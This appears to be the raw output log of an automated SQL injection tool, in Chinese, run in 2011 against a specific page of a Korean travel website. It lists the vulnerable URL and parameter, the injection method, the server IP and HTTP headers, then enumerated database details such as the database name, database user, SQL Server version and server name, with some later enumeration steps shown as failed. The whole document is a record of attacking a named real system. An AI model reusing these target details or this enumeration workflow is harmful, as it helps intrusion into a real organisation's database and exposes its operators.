■漏洞信息:============================================================
 ・URL:http://nps.mgtravel.co.kr/web/pkg/pkg_apply_input.asp?area=&menu_id=62&id=156
 ・页面标题：惫刮楷陛 - 咯青冀记
 ・参数:area=&menu_id=62&id=156
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:211.108.62.146
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 15:36:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 14391
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAACDSQQQ=KFEFPHCAFLNINNGCEHDOEIEA; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：golfzzim
- 用户名：dbu_golfzzim
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：NS2
- 服务名：MSSQLSERVER
- 系统用户名：dbu_golfzzim

 ・当前用户权限：
获取用户权限失败！

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
